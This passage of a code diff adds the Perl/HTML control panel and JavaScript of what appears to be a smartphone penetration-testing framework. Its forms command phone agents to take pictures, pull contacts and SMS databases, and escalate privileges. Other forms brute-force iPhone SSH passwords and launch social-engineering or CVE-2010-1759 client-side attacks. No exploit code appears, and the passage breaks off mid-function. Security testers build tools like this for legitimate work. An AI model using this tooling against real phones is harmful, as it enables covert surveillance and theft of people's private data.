+ <label for="agentPhNo">Agent Phone Number: </label> <br /> <input type=text name="agentPhNo" />
+
+ <br /><br />
+
+
+ <label for="controlPhNo">Control Phone Number: </label> <br /> <input type=text name="controlPhNo" />
+
+<div id="secondColumn" name="secondColumn">
+ <label for="agentURLPath">Agent URL Path: </label><br /><input type=text name="agentURLPath" />
+ <br /><br />
+
+ <label for="agentControlKey">Agent Control Key: </label> <br /> <input type=text name="agentControlKey" />
+ <br />
+</div>
+
+<div id="platform1" name="platform1">
+ <label for="platformDD1">Platform: </label> <br />
+ <select id="platformDD1" name="platformDD1">
+ <option value="android">Android</option>
+ <option value="iphone">iPhone</option>
+ <option value="blackberry">Blackberry</option>
+ </select>
+
+ <br />
+</div>
+
+ <br /><input type="submit" class="submitButton" name="submitAttach" id="submitAttach" value="Attach " onclick="submitForm(13);"/>
+
+<br />
+<br />
+
+
+</fieldset>
+</div>
+
+<br />
+
+<!-- ------------Send Command -------------->
+
+
+<div id="sendCommandRadio">
+ <input type="radio" name="options" value="SendCommand" onClick="showDiv('sendCommand', 'sendCommandRadio')" />
+ Send Command<br />
+</div>
+<div id="sendCommand">
+<fieldset>
+ <legend>Send Command</legend><br />
+ <label for="agentDD">Choose Agent: </label> <br />
+ <select name="agentsDD" id="agentsDD">
+
+EOT
+
+ $sql->execute;
+ while ($id=$sql->fetchrow_array())
+ {
+
+ print "<option>$id</option>";
+ }
+
+print <<"ET";
+
+ </select>
+ <br /> <br />
+
+ <input type="radio" name="options" value="sendSMS"
+ onclick="resetOptions();showDiv2('deliveryMethod');showDiv2('recipient');
+ showDiv2('message');modemNum();showButton('submitSend');" />
+ Send SMS <br />
+ <input type="radio" name="options" value="takePic" onclick="resetOptions();
+ showDiv2('deliveryMethod');modemNum(); showButton('submitPicture');" />
+ Take Picture <br />
+ <input type="radio" name="options" value="getContacts"
+ onclick="resetOptions();showDiv2('deliveryMethod');showDiv2('returnMethod');modemNum();
+ showButton('submitContacts'); " />
+ Get Contacts <br />
+ <input type="radio" name="options" value="getSMSDatabase"
+ onclick="resetOptions();showDiv2('deliveryMethod');showDiv2('returnMethod');modemNum();
+ showButton('submitGetDatabase'); " />
+ Get SMS Database <br />
+ <input type="radio" name="options" value="getSMSDatabase"
+ onclick="resetOptions();showDiv2('deliveryMethod'); modemNum();
+ showButton('submitEscalate'); " />
+ Privilege Escalation
+ <br /> <br />
+
+<div id="deliveryMethod" name="deliveryMethod">
+ <label for="deliveryMethodRB">Delivery Method: </label> <br />
+ <input type="radio" name="deliveryMethodRB" id="smsDelivery" value="SMS" onclick="modemNum();">SMS &nbsp; &nbsp;
+ <input type="radio" name="deliveryMethodRB" id="httpDelivery" value="HTTP" onclick="modemNum();">HTTP<br />
+</div>
+
+<div id="returnMethod" name="returnMethod">
+ <label for="returnMethodRB">Return Method: </label> <br />
+ <input type="radio" name="returnMethodRB" id="smsReturn" value="SMS" onclick="modemNum();">SMS &nbsp; &nbsp;
+ <input type="radio" name="returnMethodRB" id="httpReturn" value="HTTP" onclick="modemNum();">HTTP<br />
+</div>
+
+<div id="message" name="message">
+ <label for="messageTB">Message: </label> <br />
+ <textarea rows="3" cols="20" name="messageTB" id="messageTB" ></textarea>
+ <br /> <br />
+</div>
+
+<div id="recipient" name="recipient">
+ <label for="recipient">Recipient's Phone No: </label> <br /> <input type=text name="recipient" />
+ <br />
+</div>
+
+<div id="modemNumber" name="modemNumber">
+<label for="modemNoDD">Mobile Modem Number: </label> <br />
+ <select name="modemNoDD" id="modemNoDD">
+
+ET
+
+ $sql2->execute;
+ while ($no =$sql2->fetchrow_array())
+ {
+
+ print "<option>$no</option>";
+ }
+
+print <<"ET";
+
+</select>
+</div>
+ <br />
+ <input type="submit" class="submitButton" name="submitSend" id="submitSend" value="Send"
+ onclick="submitForm(8);"/>
+ <input type="submit" class="submitButton" name="submitPicture" id="submitPicture" value="Take Picture"
+ onclick="submitForm(9);"/>
+ <input type="submit" class="submitButton" name="submitContacts" id="submitContacts" value="Get Contacts"
+ onclick="submitForm(10);"/>
+ <input type="submit" class="submitButton" name="submitDatabase" id="submitGetDatabase" value="Get Database"
+ onclick="submitForm(11);"/>
+ <input type="submit" class="submitButton" name="submitEscalate" id="submitEscalate" value="Escalate"
+ onclick="submitForm(12);"/>
+</fieldset>
+</div>
+
+<br />
+
+<!-- --------------- View Info Gathered ------------------->
+
+<div id="infoGatheredRadio" name="infoGatheredRadio">
+ <input type="radio" name="options" value="infoGathered" onClick="showDiv('infoGathered', 'infoGatheredRadio')" />
+ View Information Gathered <br />
+</div>
+<div id="infoGathered" name="infoGathered">
+<fieldset>
+ <legend>View Information Gathered</legend><br />
+
+ <br /> <br />
+ <br />
+ <input type="submit" class="submitButton" name="submitView" id="submitView" value="View "
+ onclick="submitForm(7);" />
+</fieldset>
+</div>
+
+
+<br />
+
+<!-- --------------- Attach Framework to Mobile Modem ------------------->
+
+
+<div id="attachMobileModemRadio" name="attachMobileModemRadio">
+ <input type="radio" name="options" value="attachMobileModem"
+ onClick="showDiv('attachMobileModem', 'attachMobileModemRadio')" /> Attach Framework to Mobile Modem <br />
+</div>
+<div id="attachMobileModem" name="attachMobileModem">
+<fieldset>
+ <legend>Attach Framework to Mobile Modem</legend><br /> <br />
+
+ <input type="radio" name="attachFramework" value="search"
+ onclick="hideDiv('attachSmartPhone'); hideDiv('submitAttachModemAttach'); showButton('submitAttachModemSearch');" />
+ Search For Attached Modem <br /><br />
+ <input type="radio" name="attachFramework" value="attachToApp"
+ onclick="showDiv2('attachSmartPhone'); hideDiv('submitAttachModemSearch'); showButton('submitAttachModemAttach');"/>
+ Attach to SmartPhone Based App <br />
+
+<br />
+
+<div id="attachSmartPhone" name="attachSmartPhone">
+ <label for="modemPhoneNo">Phone Number: </label> <br /> <input type=text name="modemPhoneNo" />
+ <br />
+ <label for="controlKey">Control Key: </label> <br /> <input type=text name="controlKey" />
+ <br />
+
+ <label for="appURLPath">App URL Path: </label> <br /> <input type=text name="appURLPath" />
+ <br />
+
+</div>
+
+ <br />
+ <br />
+ <input type="submit" class="submitButton" name="submitAttachModemSearch" id="submitAttachModemSearch" value="Search " onclick="submitForm(5);" />
+ <input type="submit" class="submitButton" name="submitAttachModemAttach" id="submitAttachModemAttach" value="Attach " onclick="submitForm(6);"/>
+</fieldset>
+
+</div>
+
+<br />
+
+
+<!-- ---------- Remote Attack ------------>
+
+<div id="remoteAttackRadio" name="remoteAttackRadio">
+ <input type="radio" name="options" value="remoteAttack"
+ onClick="showDiv('remoteAttack', 'remoteAttackRadio');" /> Run a Remote Attack<br />
+</div>
+<div id="remoteAttack" name="remoteAttack">
+<fieldset>
+ <legend>Run a Remote Attack</legend><br /> <br />
+
+ <input type="radio" name="defaultSSHPassword" value="password"
+ onclick="showDiv2('ipAddress');showButton('submitRemoteAttack'); hideDiv('submitGuessPassword'); hideDiv('password');" />
+ Test for Default SSH password (iPhone)<br /><br />
+
+
+<input type="radio" name="defaultSSHPassword" value="guessPassword"
+ onclick="showDiv2('ipAddress'); showDiv2('password'); hideDiv('submitRemoteAttack'); showButton('submitGuessPassword');" />
+ Guess SSH password (iPhone)<br /><br />
+
+<br />
+<div id="ipAddress" name="ipAddress">
+ <label for="ipAddressTB">IP Address: </label> <br /> <input type=text name="ipAddressTB" />
+ <br />
+</div>
+
+<div id="password" name="password">
+ <label for="passwordFileTB">Password File: </label> <br /> <input type=text name="passwordFileTB" />
+ <br />
+</div>
+
+
+ <input type="submit" class="submitButton" name="submitRemoteAttack"
+ id="submitRemoteAttack" value="Attack " onclick="submitForm(4);"/>
+ <input type="submit" class="submitButton" name="submitGuessPassword"
+ id="submitGuessPassword" value="Attack " onclick="submitForm(14);"/>
+</fieldset>
+</div>
+
+
+<br />
+
+
+
+<!-- ----------------------Social Engineering or Client Side Attack ----------->
+
+<div id="SEorCSAttackRadio">
+ <input type="radio" name="options" value="SEorCSAttack"
+ onClick="showDiv('SEorCSAttack', 'SEorCSAttackRadio')" /> Run a Social Engineering or Client Side Attack<br />
+</div>
+<div id="SEorCSAttack">
+<fieldset>
+ <legend>Run a Social Engineering or Client Side Attack</legend><br /> <br />
+
+ <input type="radio" name="SEorCSAttackRB" value="downloadAgent"
+ onclick="hideDiv('shell'); hideDiv('submitCSAttack'); showDiv2('platform2'); showDiv2('hPath');
+ showDiv2('otherInfo'); showDiv2('modemNumber2');showButton('submitSEAttack');" />
+ Direct Download Agent<br /> <br />
+ <input type="radio" name="SEorCSAttackRB" value="clientSideShell"
+ onclick="hideDiv('platform2'); hideDiv('submitSEAttack'); showDiv2('shell'); showDiv2('hPath'); showDiv2('otherInfo'); showDiv2('modemNumber2'); showButton('submitCSAttack');" />
+ Client Side Shell<br /><br />
+
+
+<br />
+
+<div id="platform2" name="platform2">
+ <label for="platformDD2">Platform: </label> <br />
+ <select name="platformDD2" id="platformDD2">
+ <option value="android">Android</option>
+ <option value="iphone">iPhone</option>
+ <option value="blackberry">Blackberry</option>
+ </select>
+
+ <br />
+</div>
+
+<div id="shell" name="shell">
+ <label for="shellDD">Exploit: </label> <br />
+ <select id="exploit" name="exploit">
+ <option value="20101759">CVE-2010-1759 WebKit Vuln Android</option>
+ </select>
+
+ <br />
+</div>
+
+<div id="hPath" name="hPath">
+ <label for="hostingPath">Hosting Path: </label> <br /> <input type=text name="hostingPath" />
+
+ <br /><br />
+</div>
+
+
+<div id="otherInfo" name="otherInfo">
+ <label for="fileName">File Name: </label> <br /> <input type=text name="fileName" /> <br /><br />
+ <label for="phNo2Attack">Phone No to Attack: </label> <br /> <input type=text name="phNo2Attack" />
+ <br /> &nbsp; <br />
+</div>
+
+<div id="modemNumber2" name="modemNumber2">
+<label for="modemNoDD2">Mobile Modem Number: </label> <br />
+ <select name="modemNoDD2" id="modemNoDD2">
+
+EOT
+ET
+
+ $sql2->execute;
+ while ($no1 =$sql2->fetchrow_array())
+ {
+
+ print "<option>$no1</option>";
+ }
+
+print <<"ET";
+
+</select>
+</div>
+
+
+ <input type="submit" class="submitButton" name="submitSEAttack" id="submitSEAttack"
+ value="Attack " onclick="submitForm(2);" />
+ <input type="submit" class="submitButton" name="submitCSAttack" id="submitCSAttack"
+ value="Attack " onclick="submitForm(3);" />
+<br /><br /><br />
+</fieldset>
+</div>
+
+<br />
+
+<!-- ---------------------- Clear/Create Database ----------->
+
+
+
+<div id="databaseRadio" name="databaseRadio">
+ <input type="radio" name="options" value="Database" onClick="showDiv('database', 'databaseRadio');" >
+ Clear/Create Database<br />
+</div>
+<div id="database">
+
+<fieldset>
+ <legend>Clear/Create Database</legend><br /> <br />
+
+
+<br />
+
+
+ <input type="button" class="submitButton" name="submitDatabase" id="submitDatabase" value="Clear/Create "
+ onclick="confirmAndCreate();" />
+
+
+
+</fieldset>
+
+</div>
+
+
+<br />
+<!-- -->
+
+
+
+
+
+</fieldset>
+</form>
+</body>
+</html>
+
+ET
View
97 frameworkgui/myJavaScript.js
@@ -0,0 +1,97 @@
+
+
+ function resetButtons()
+ {
+ document.getElementById("attach").style.display="none";
+ document.getElementById("attachRadio").style.display="block";
+ document.getElementById("sendCommand").style.display="none";
+ document.getElementById("sendCommandRadio").style.display="block";
+ document.getElementById("infoGathered").style.display="none";
+ document.getElementById("infoGatheredRadio").style.display="block";
+ document.getElementById("attachMobileModem").style.display="none";
+ document.getElementById("attachMobileModemRadio").style.display="block";
+ document.getElementById("remoteAttack").style.display="none";
+ document.getElementById("remoteAttackRadio").style.display="block";
+ document.getElementById("SEorCSAttack").style.display="none";
+ document.getElementById("SEorCSAttackRadio").style.display="block";
+ document.getElementById("database").style.display="none";
+ document.getElementById("databaseRadio").style.display="block";
+
+ }
+
+ function resetOptions()
+ {
+ document.getElementById("deliveryMethod").style.display="none";
+ document.getElementById("returnMethod").style.display="none";
+ document.getElementById("message").style.display="none";
+ document.getElementById("submitSend").style.display="none";
+ document.getElementById("submitPicture").style.display="none";
+ document.getElementById("submitContacts").style.display="none";
+ document.getElementById("submitGetDatabase").style.display="none";
+ document.getElementById("submitEscalate").style.display="none";
+ document.getElementById("recipient").style.display="none";
+ }
+
+
+
+ function showDiv(divName, radio)
+ {
+ resetButtons();
+ document.getElementById(divName).style.display="block";
+ document.getElementById(radio).style.display="none";
+ }
+
+ function showDiv2(divName)
+ {
+ document.getElementById(divName).style.display="block";
+ }
+
+ function hideDiv(divName)
+ {
+ document.getElementById(divName).style.display="none";
+ }
+
+
+ function confirmAndCreate()
+ {
+ var answer=confirm("This will destroy your data. Are you sure you want to do this?");
+ if (answer)
+ submitForm(1);
+ }
+ function showButton(divName)
+ {
+ document.getElementById(divName).style.display="block";
+ }
+ function submitForm(which)
+ {
+ if (which == 1)
+ document.forms["main"].action="createDatabase.pl";
+ else if (which == 2)
+ document.forms["main"].action="SEAttack.pl";
+ else if (which == 3)
+ document.forms["main"].action="CSAttack.pl";
+ else if (which == 4)
+ document.forms["main"].action="remoteAttack.pl";
+ else if (which == 5)
+ document.forms["main"].action="search.pl";
+ else if (which == 6)
+ document.forms["main"].action="attachMobileModem.pl";
+ else if (which == 7)
+ document.forms["main"].action="viewInfo.pl";
+ else if (which == 8)
+ document.forms["main"].action="sendSMS.pl";
+ else if (which == 9)
+